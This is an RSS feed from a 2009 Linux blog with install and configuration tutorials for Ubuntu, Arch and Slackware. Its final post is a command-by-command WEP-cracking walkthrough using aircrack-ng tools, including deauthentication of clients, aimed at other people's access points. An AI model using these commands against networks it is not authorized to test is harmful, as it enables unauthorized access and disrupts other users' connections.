<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Scribute &#187; Linux</title>
	<atom:link href="http://scribute.com/category/linux/feed/" rel="self" type="application/rss+xml" />
	<link>http://scribute.com</link>
	<description>Blog of Knowledge.</description>
	<lastBuildDate>Thu, 08 Jul 2010 16:54:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>Install Ubuntu on Eee PC</title>
		<link>http://scribute.com/2009/03/install-ubuntu-on-eee-pc/</link>
		<comments>http://scribute.com/2009/03/install-ubuntu-on-eee-pc/#comments</comments>
		<pubDate>Tue, 31 Mar 2009 12:01:11 +0000</pubDate>
		<dc:creator>korupt3d</dc:creator>
				<category><![CDATA[Asus eee]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[asus]]></category>
		<category><![CDATA[eee]]></category>
		<category><![CDATA[netbook]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://scribute.com/?p=139</guid>
		<description><![CDATA[The easiest way to install Ubuntu, or any distro at that, is to make a bootable flash drive to install from. From Linux or Windows you can download and install UNetbootin, which will automatically download Ubuntu and create a bootable flash drive. All you have to do is stick in a flash drive and select [...]]]></description>
			<content:encoded><![CDATA[<p>The easiest way to install Ubuntu, or any distro at that, is to make a bootable flash drive to install from. From Linux or Windows you can download and install <a href="http://unetbootin.sourceforge.net/">UNetbootin</a>, which will automatically download Ubuntu and create a bootable flash drive. All you have to do is stick in a flash drive and select the distro and version you want (in this case, obviously, Ubuntu 8.10). Do not choose the 8.10 net install&#8230;emphasis on NET&#8230;just choose the Live version.</p>
<p>Once UNetbootin finishes, open your USB drive and do the following:</p>
<p>Delete SYSLINUX.CFG:</p>
<pre>rm SYSLINUX.CFG</pre>
<p>Rename the ISOLINUX directory to SYSLINUX:</p>
<pre>mv ISOLINUX SYSLINUX</pre>
<p>Enter the SYSLINUX directory:</p>
<pre>cd SYSLINUX</pre>
<p>Rename ISOLINUX.CFG to SYSLINUX.CFG:</p>
<pre>mv ISOLINUX.CFG SYSLINUX.CFG</pre>
<p>Now you have a working Ubuntu Live Flash Drive!</p>
<p>Insert your new flash drive into one of the *right* USB ports of your Asus eee 1000HA. I say right because they have been a lot more reliable for me when booting from USB, but maybe that&#8217;s just me.</p>
<p>Boot up your eee and push esc when you see the boot screen. This should bring up the familiar Ubuntu Live screen where you can pick whether to start a Live session or go to the Installation. Installation is the obvious choice here. The Ubuntu Installation itself is past the scope of this wiki, but you can find help at <a href="http://ubuntu.com">ubuntu.com</a>.<br />
<span id="more-139"></span></p>
<p>Once you have finished the installation you may notice that your wireless NIC is not yet recognized. Don&#8217;t worry, we are about to fix that, and a lot more.</p>
<p>First, setup the array.org repository in your apt sources:</p>
<pre>wget http://www.array.org/ubuntu/array-intrepid.list (external link)
sudo mv -v array-intrepid.list /etc/apt/sources.list.d/</pre>
<p>Be sure to install the key for the repository:</p>
<pre>wget http://www.array.org/ubuntu/array-apt-key.asc (external link)
sudo apt-key add array-apt-key.asc</pre>
<p>Update your apt-cache:</p>
<pre>sudo apt-get update</pre>
<p>Install the kernel:</p>
<pre>sudo apt-get install linux-eeepc</pre>
<p>Now reboot. When your computer restarts, make sure you are now using the correct kernel by pressing esc when the grub information is displayed and select the kernel that ends in &#8220;-eeepc&#8221;</p>
<p>Now remove the original kernel:</p>
<pre>sudo apt-get remove linux-.*-generic</pre>
<p>You are now the proud owner of an Ubuntu based eee!</p>
]]></content:encoded>
			<wfw:commentRss>http://scribute.com/2009/03/install-ubuntu-on-eee-pc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Install Internet Explorer in Arch Linux</title>
		<link>http://scribute.com/2009/03/install-internet-explorer-in-arch-linux/</link>
		<comments>http://scribute.com/2009/03/install-internet-explorer-in-arch-linux/#comments</comments>
		<pubDate>Tue, 17 Mar 2009 12:42:53 +0000</pubDate>
		<dc:creator>korupt3d</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Web Design]]></category>
		<category><![CDATA[arch]]></category>
		<category><![CDATA[explorer]]></category>
		<category><![CDATA[ies4linux]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[microsoft]]></category>

		<guid isPermaLink="false">http://scribute.com/?p=106</guid>
		<description><![CDATA[At some point in time, no matter how much you dread it, you will need to use Internet Explorer. That&#8217;s right, the same IE that comes from the evil Microsoft. I use it strictly to test websites, which is the only thing I recommend it for. Anyways, if you need to install it in Arch [...]]]></description>
			<content:encoded><![CDATA[<p>At some point in time, no matter how much you dread it, you will need to use Internet Explorer. That&#8217;s right, the same IE that comes from the evil Microsoft. I use it strictly to test websites, which is the only thing I recommend it for. Anyways, if you need to install it in Arch Linux, do the following.</p>
<p>Install IEs4Linux:</p>
<pre>pacman -S ies4linux</pre>
<p>That will automatically install Wine for you also, if you don&#8217;t already have it. Now that you have the installer installed, it&#8217;s time to install (say that 3 times fast):</p>
<pre>ies4linux --beta-install-ie7</pre>
<p>This will bring up a GUI to install IE 5 through 7. Now it&#8217;s as simple as hitting OK to install.</p>
<p>To launch IE6:</p>
<pre>~/.ies4linux/bin/ie6</pre>
]]></content:encoded>
			<wfw:commentRss>http://scribute.com/2009/03/install-internet-explorer-in-arch-linux/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Arch Linux ATI Catalyst xorg.conf</title>
		<link>http://scribute.com/2009/03/arch-linux-ati-catalyst-xorgconf/</link>
		<comments>http://scribute.com/2009/03/arch-linux-ati-catalyst-xorgconf/#comments</comments>
		<pubDate>Mon, 16 Mar 2009 12:22:56 +0000</pubDate>
		<dc:creator>korupt3d</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[arch]]></category>
		<category><![CDATA[ati]]></category>
		<category><![CDATA[catalyst]]></category>
		<category><![CDATA[conf]]></category>
		<category><![CDATA[radeon]]></category>
		<category><![CDATA[xorg]]></category>
		<category><![CDATA[xorg.conf]]></category>

		<guid isPermaLink="false">http://scribute.com/?p=102</guid>
		<description><![CDATA[Here is my xorg.conf. I am using an ATI Radeon 9550 AGP graphics card in my Arch Linux box. I figured this may help some people who are having problems with fglrx. Section "ServerLayout" Identifier "aticonfig Layout" Screen 0 "aticonfig-Screen[0]-0" 0 0 EndSection Section "Files" EndSection Section "Module" EndSection Section "Monitor" Identifier "aticonfig-Monitor[0]-0" Option "VendorName" [...]]]></description>
			<content:encoded><![CDATA[<p>Here is my xorg.conf. I am using an ATI Radeon 9550 AGP graphics card in my Arch Linux box. I figured this may help some people who are having problems with fglrx.</p>
<pre>
Section "ServerLayout"
	Identifier     "aticonfig Layout"
	Screen      0  "aticonfig-Screen[0]-0" 0 0
EndSection

Section "Files"
EndSection

Section "Module"
EndSection

Section "Monitor"
	Identifier   "aticonfig-Monitor[0]-0"
	Option	    "VendorName" "ATI Proprietary Driver"
	Option	    "ModelName" "Generic Autodetecting Monitor"
	Option	    "DPMS" "true"
EndSection

Section "Device"
	Identifier  "aticonfig-Device[0]-0"
	Driver      "fglrx"
	BusID       "PCI:1:0:0"
EndSection

Section "Screen"
	Identifier "aticonfig-Screen[0]-0"
	Device     "aticonfig-Device[0]-0"
	Monitor    "aticonfig-Monitor[0]-0"
	DefaultDepth     24
	SubSection "Display"
		Viewport   0 0
		Depth     24
	EndSubSection
EndSection
</pre>
]]></content:encoded>
			<wfw:commentRss>http://scribute.com/2009/03/arch-linux-ati-catalyst-xorgconf/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>10 Things After Installing Arch Linux</title>
		<link>http://scribute.com/2009/03/10-things-after-installing-arch-linux/</link>
		<comments>http://scribute.com/2009/03/10-things-after-installing-arch-linux/#comments</comments>
		<pubDate>Mon, 02 Mar 2009 22:16:26 +0000</pubDate>
		<dc:creator>korupt3d</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[arch linux]]></category>
		<category><![CDATA[install]]></category>
		<category><![CDATA[upgrade]]></category>

		<guid isPermaLink="false">http://scribute.com/?p=68</guid>
		<description><![CDATA[Upgrade Everything When you install Arch you are installing a “snapshot” of where Arch was at the time that .iso was released. This means, depending on how recently it was released, many, many packages will be out-of-date. To update the entire system you only need to issue one, simple command as root: pacman -Syu Install [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Upgrade Everything</strong><br />
When you install Arch you are installing a “snapshot” of where Arch was at the time that .iso was released. This means, depending on how recently it was released, many, many packages will be out-of-date. To update the entire system you only need to issue one, simple command as root:</p>
<pre>pacman -Syu</pre>
<p><strong>Install Screen</strong><br />
Not only can you use screen instead of a window manager/desktop environment, you can use them together! Screen is always the first thing I install when configuring a new Arch install. It will allow you (if you know how, more on that <a href="http://www.kuro5hin.org/story/2004/3/9/16838/14935">here</a>) to do multiple things at once, like edit your rc.conf while installing <a href="http://www.eclipse.org/">Eclipse</a> at the same time. To install screen:</p>
<pre>pacman -S screen</pre>
<p><strong>Install vim</strong><br />
Vim is the best CLI text editor. Period. Nothing else even comes close. Before editing ANY files or installing anything other than those previously mentioned, I must install vim. To easily install via pacman:</p>
<pre>pacman -S vim</pre>
<p><strong>Edit Sudoers</strong><br />
Edit your sudoers file now or it will begin to piss you off, forcing you to stop being lazy, put aside anything you are doing, and enter:</p>
<pre>vim /etc/sudoers</pre>
<p>If you would like to be allowed to sudo anything, place</p>
<pre>yourusername ALL=(ALL) ALL</pre>
<p>on the line under:</p>
<pre>root ALL=(ALL) ALL</pre>
<p>Now that you have done this, instead of typing &#8216;su&#8217; and then entering a root password everytime you want to install a program, you can just type:</p>
<pre>sudo myRootCommand</pre>
<p>and enter your password when prompted.<br />
<span id="more-68"></span><br />
<br />
<strong>Install xorg:</strong><br />
You must install xorg before you can see a graphical environment. Also in this step, we will install our video card drivers. To do all of this at once, do one of the following<br />
ATI: </p>
<pre>pacman -S xorg catalyst hwd</pre>
<p>Nvidia: </p>
<pre>pacman -S xorg xfree86-video-nvidia hwd</pre>
<p>Now automaticall configure your xorg.conf by running the following as root, and answering “y” to the question asked:</p>
<pre>hwd -xa</pre>
<p><strong>Install a Window Manager / Desktop Environment</strong><br />
Do you want a Window Manager or a Desktop Environment? Your decision may be based on the speed/specs of your computer. If you have a slow processor and little RAM, then I would recommend you go with a WM. If you have a fast computer than a DE might be just the thing for you. I tend to switch between Openbox(WM) and Gnome(DE). Never install a DEA, ass it will invade your privacy. To install your WM/DE of choice:<br />
Gnome: </p>
<pre>pacman -S gnome</pre>
<p>Openbox: </p>
<pre>pacman -S openbox</pre>
<p>KDE: </p>
<pre>pacman -S kde</pre>
<p>If you like KDE then you may want to try <a href="http://kdemod.ath.cx/">KDEmod</a> (KDE optimized for Arch).<br />
<br />
<strong>Install Mozilla Apps</strong><br />
Mozilla makes a good portion of my favorite apps. I use <a href="http://getfirefox.com">Firefox</a> for daily web-browsing, <a href="http://www.mozilla.com/thunderbird/">Thunderbird</a> for daily e-mail, and <a href="http://www.mozilla.org/projects/calendar/sunbird/">Sunbird</a> for daily tasks. There are so many apps out there that do these same things, we are so lucky to have such good and free alternative versions. Put this good fortune to use! Don&#8217;t earn your friends&#8217; respect by installing Linux, only to lose it by running <a href="http://scribute.com/2009/03/install-internet-explorer-in-arch-linux/">Internet Explorer</a>. Do this easily with:</p>
<pre>pacman -S firefox thunderbird sunbird</pre>
<p><strong>Install Yaourt</strong><br />
Yaourt, or “Yet Another User Repository Tool“, is a frontend to pacman that allows you to install apps from the AUR. The AUR, or Arch User Repository, contains tons of apps that have not yet been added to the official Arch package repositories. These packages are maintained by users and installed on your system with yaourt via Arch&#8217;s “makepkg” command. To do this, first add the following to your /etc/pacman.conf file:</p>
<pre>[archlinuxfr]
Server = http://repo.archlinux.fr/i686</pre>
<p>Once you have done that, update pacman and install yaourt:</p>
<pre>pacman -Sy yaourt</pre>
<p><strong>Install zsh</strong><br />
Zsh is, in my opinion, the best shell. Not to mention it is awesome with the autocomplete function that integrates with yaourt. To install zsh do the all-too-familiar:</p>
<pre>pacman -S zsh</pre>
<p>Once installed, you must do the following as root:</p>
<pre>usermod -s /bin/zsh paul</pre>
<p><strong>Install Your Favorite Apps</strong><br />
What you install after installing Arch Linux does not, by any means, have to be limited to my opinions. Try new software, see what you like. Install different apps that do the same things to find your preference. Install apps you&#8217;ve never heard of and become a master at them. This is a big part of becoming a knowledgeable Linux user.<br />
Some suggestions:</p>
<ul>
<li>Inkscape</li>
<li>GIMP</li>
<li>OpenOffice</li>
<li>BlogBridge (from AUR &#8212; I maintain this package)</li>
</ul>
<p></p>
]]></content:encoded>
			<wfw:commentRss>http://scribute.com/2009/03/10-things-after-installing-arch-linux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Arch Linux</title>
		<link>http://scribute.com/2009/01/arch-linux/</link>
		<comments>http://scribute.com/2009/01/arch-linux/#comments</comments>
		<pubDate>Wed, 14 Jan 2009 23:19:33 +0000</pubDate>
		<dc:creator>korupt3d</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[arch linux]]></category>
		<category><![CDATA[distribution]]></category>
		<category><![CDATA[distro]]></category>

		<guid isPermaLink="false">http://scribute.com/?p=47</guid>
		<description><![CDATA[Today I ditched Slackware completely. It used to be my number one, most used operating system. Until I found one that was better. It all started when I got my Asus eee 1000HA. I installed a half-dozen different OS&#8217;s on it trying to find one that worked well with the weird hardware, and one that [...]]]></description>
			<content:encoded><![CDATA[<p>Today I ditched Slackware completely. It used to be my number one, most used operating system. Until I found one that was better. </p>
<p>It all started when I got my Asus eee 1000HA. I installed a half-dozen different OS&#8217;s on it trying to find one that worked well with the weird hardware, and one that I liked. I just couldn&#8217;t find it. I tried Ubuntu with Adam&#8217;s kernel, gentoo, FreeBSD, Slackware, and Debian. Either it didn&#8217;t work with enough of the hardware or I just plain didn&#8217;t like it. Until I found Arch, which was about the same time that my mind was blown.</p>
<p>I never knew an OS could be so simple, yet extremely personal. There is now not a single program on my eee that I don&#8217;t want there. Not a single library. Not a single web browser. Everything that was installed was because I requested it to be installed. And it&#8217;s EASY! No, not to a n00b, but if you have decent linux experience, it is easy.</p>
<p>And the package manager! I really don&#8217;t like apt-get very much. I don&#8217;t mind sbopkg in Slackware, but it doesn&#8217;t find dependencies. But pacman (Arch&#8217;s pm) is simply amazing. It has support for rolling updates so you never need to worry about installing another release again.<br />
&#8220;What&#8217;s that? KDE 4.2 was announced today? Let me install it, and while I&#8217;m at it I&#8217;ll just do a system update too.&#8221;<br />
Types in terminal: # pacman -Syu</p>
<p>That&#8217;s it! I now have the latest kernel, KDE, and any other package on my system!</p>
<p><a href="http://www.archlinux.org/">Give it a go</a> if you don&#8217;t believe me.</p>
<p>Update: Arch just added kernel 2.6.28 to it&#8217;s core, meaning you can upgrade to this version with &#8220;pacman -Syu&#8221;. This also means you are eligible for the new filesystem, ext4.</p>
]]></content:encoded>
			<wfw:commentRss>http://scribute.com/2009/01/arch-linux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Upgrading Slackware kernel to 2.6.28</title>
		<link>http://scribute.com/2009/01/upgrading-slackware-kernel-to-2628/</link>
		<comments>http://scribute.com/2009/01/upgrading-slackware-kernel-to-2628/#comments</comments>
		<pubDate>Mon, 12 Jan 2009 23:18:47 +0000</pubDate>
		<dc:creator>korupt3d</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[2.6.28]]></category>
		<category><![CDATA[compile]]></category>
		<category><![CDATA[install]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[slackware]]></category>
		<category><![CDATA[update]]></category>
		<category><![CDATA[upgrade]]></category>

		<guid isPermaLink="false">http://scribute.com/?p=34</guid>
		<description><![CDATA[First we are going to make a new directory to work with. I did this in my home folder. mkdir ~/linux Next download the 2.6.28 kernel to this folder. When that is finished, unarchive it with: tar -xjvf linux-2.6.28.tar.bz2 cd linux-2.6.28 Now to make the config file. (Notice that the $ before the pre is [...]]]></description>
			<content:encoded><![CDATA[<p>First we are going to make a new directory to work with. I did this in my home folder.</p>
<pre>mkdir ~/linux</pre>
<p>Next <a href="http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.28.tar.bz2">download</a> the 2.6.28 kernel to this folder. When that is finished, unarchive it with:</p>
<pre>tar -xjvf linux-2.6.28.tar.bz2</pre>
<pre>cd  linux-2.6.28</pre>
<p>Now to make the config file. (Notice that the $ before the pre is not actually typed, this indicates your regular user shell, while # means root shell)</p>
<pre>$ make xconfig</pre>
<p>Now we run:</p>
<pre>$ make</pre>
<p>Go get some coffee, this may take some time.<br />
Now for the moment you&#8217;ve been waiting for, we get to become root! Under root, run:</p>
<pre># make modules_install</pre>
<p>Better safe than sorry &#8211; just to be sure of the version, run:</p>
<pre># make kernelversion</pre>
<p>Which should output 2.6.28. If it did, great, move on. If not&#8230;you messed up, sorry, do not pass go, do not collect $200.<br />
I am not going to go in depth into the following commands, it&#8217;s just copying stuff to other places, pretty self explanatory. If you don&#8217;t know what&#8217;s going on, that&#8217;s OK just follow along.<br />
<span id="more-34"></span></p>
<pre># cd ..
# cp -R linux-2.6.28 /usr/src
# cd /usr/src
# rm linux
# ln -s linux-2.6.28 linux
# cd linux
# cp System.map /boot/System.map-2.6.28
# cp .config /boot/config-2.6.28
# cp arch/i386/boot/bzImage /boot/vmlinuz-2.6.28
</pre>
<p>Okay, now that all the copying is done, we need to configure lilo to boot into our new kernel.</p>
<pre># vim /etc/lilo.conf</pre>
<p>Add this above # Linux bootable partition config begins:</p>
<pre>image = /boot/vmlinuz-2.6.28
  root = /dev/sda1
  initrd = /boot/initrd-2.6.28.gz
  label = SlackwareNew
  read-only
</pre>
<p>Note: your &#8220;root = &#8221; may not be /dev/sda1. Copy whatever it is in the existing &#8220;Linux&#8221; &#8220;root&#8221; under what you are currently typing.<br />
And change the existing:</p>
<pre>image = /boot/vmlinuz</pre>
<p>To:</p>
<pre>image = boot/vmlinuz-old</pre>
<p>Now save and exit lilo.conf (if you don&#8217;t know how, google vim)<br />
Next, follow this list of commands:</p>
<pre># /sbin/lilo
# cd /boot
# mv System.map System.map-old
# mv config config-old
# mv vmlinuz vmlinuz-old
# mkinitrd -c -k 2.6.28 -m mbcache:jbd:ext3 -f ext3 -r /dev/sda1 -o /boot/initrd-2.6.28.gz
</pre>
<p>In that last command, replace anything you need to. Get more info with:</p>
<pre>vim /boot/README.initrd</pre>
<p>Now run:</p>
<pre>lilo -v</pre>
<p>Reboot and cross your fingers!</p>
]]></content:encoded>
			<wfw:commentRss>http://scribute.com/2009/01/upgrading-slackware-kernel-to-2628/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Cracking WEP with eee PC 1000HA</title>
		<link>http://scribute.com/2009/01/cracking-wep-with-eee-pc-1000ha/</link>
		<comments>http://scribute.com/2009/01/cracking-wep-with-eee-pc-1000ha/#comments</comments>
		<pubDate>Sun, 11 Jan 2009 05:39:39 +0000</pubDate>
		<dc:creator>korupt3d</dc:creator>
				<category><![CDATA[Asus eee]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[1000ha]]></category>
		<category><![CDATA[aircrack]]></category>
		<category><![CDATA[aircrack-ng]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[eee]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[wireless]]></category>
		<category><![CDATA[wpa]]></category>

		<guid isPermaLink="false">http://scribute.com/?p=20</guid>
		<description><![CDATA[The first thing we are going to do is install BackTrack 3 onto an SD card so we can boot from the SD card without having to mess up our currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over [...]]]></description>
			<content:encoded><![CDATA[<p>The first thing we are going to do is install BackTrack 3 onto an SD card so we can boot from the SD card without having to mess up our currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over the internet. <del datetime="2010-07-04T15:45:20+00:00"><a href="http://www.andrewchapman.net/component/content/article/1-latestnews/25-bt3eeepc.html">Here</a> is the article I followed.</del> Apparently the article which I followed has been taken down, but a quick google search should find another.</p>
<p>After you have booted into BackTrack 3, we are ready for the fun part. The first thing we will do is shutdown our wifi card. In the terminal:</p>
<pre>ifconfig ath0 down</pre>
<p>Next we want to bring it back up, but in monitor mode:</p>
<pre>airmon-ng start wifi0</pre>
<p>You should see that a new interface called ath1 was created. That is the interface we are going to use for the rest of our cracking. Next:</p>
<pre>airodump-ng ath1</pre>
<p>This will list all of the wifi signals your card is picking up. There are two things you are going to want to write down: the BSSID and the Channel (CH), and also make sure the Encryption (ENC) is WEP. Or, if you don&#8217;t want to write thpre down, just open a new shell and leave that one open.</p>
<p>Now press
<pre>ctrl+c</pre>
<p> to stop airodump-ng. Open a new console (if you haven&#8217;t already) and type:<br />
<span id="more-20"></span></p>
<pre>airodump-ng --channel x --bssid y -w filename ath1</pre>
<p>Where x and y are the channel and bssid that you wrote down, respectively, and filename is whatever you want the prefix of the output files to be. I usually set the filename to something along the lines of the router name, that way when I&#8217;m searching through my cracked WEP files I know whats what.</p>
<p>Now leave that running and open another shell. Type</p>
<pre>ifconfig</pre>
<p>next to
<pre>ath1</pre>
<p> write down the first 6 sets of numbers in the long string next to HWaddr, replacing the dashes with colons (e.g. 00:11:22:33:44:55). That is your computer&#8217;s MAC address, whereas the bssid is the Access Point&#8217;s MAC address that you&#8217;re trying to hack.</p>
<p>Okay, now in the same window that you typed
<pre>ifconfig</pre>
<p>, type:</p>
<pre>aireplay-ng --arpreplay -b [Access Point's MAC] -h [Your MAC] ath1</pre>
<p>Now leave that running and open yet another shell, and type:</p>
<pre>aireplay-ng --deauth 5 -c [Your Mac] -a [Access Point's MAC] ath1</pre>
<p>Now in that same window type:</p>
<pre>aircrack-ng filename*.cap</pre>
<p>Where filename is whatever you entered earlier. And there you go! You should now have the WEP key. Leave feedback in the comments. I would love to answer your questions if any arrise.</p>
]]></content:encoded>
			<wfw:commentRss>http://scribute.com/2009/01/cracking-wep-with-eee-pc-1000ha/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>
